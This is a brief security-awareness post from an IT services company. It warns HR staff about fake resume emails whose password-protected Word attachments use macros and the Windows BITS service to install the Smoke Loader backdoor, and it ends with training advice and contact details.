Malware Data TheftBeware of a New Holiday Malware Attack

Attackers are taking advantage of the New Year, when hiring initiatives and the number of job applications companies receive go up, to send fake resumes that are hiding malware.

Emailed job applications contain Word document attachments that are password-protected. This allows them to evade detection from sandboxing and filtering anti-malware protection.

The attacks abuse legitimate Windows tools.  Once enabled, a macro embedded in the Word document launches Windows Background Intelligent Transfer Service (BITS) to download the payload (a Trojan Malware called “Smoke Loader”). Because it is a legitimate service, use of BITS can bypass detection and whitelisting.

Smoke Loader malware is a backdoor that if installed, will give cybercriminals full access to an infected machine, allowing them to steal data, launch further cyberattacks on the network, and install other malware and ransomware. Smoke Loader malware is not new but it has recently been upgraded with several anti-analysis mechanisms to prevent detection. Smoke Loader malware has also been known to download other malware like the TrickBot banking Trojan and Globelmposter ransomware.

This Malware payload is stealthy and difficult to remove: Once a machine is infected, the Smoke Loader Trojan evades detection by injecting itself into legitimate processes and establishes persistence by making changes to the registry.

HR staff should be forewarned about e-mail exploits like this in a special alert and your ongoing security awareness training should stress that all e-mails that contain active content like Word documents, Excel spreadsheets and unsecure documents should be handled with great caution.

If you need help with malware detection and remediation or would like guidance on staff IT Security Training please give ACT Network Solutions a call at (847) 639-7000 or e-mail security@actnetworksolutions.com.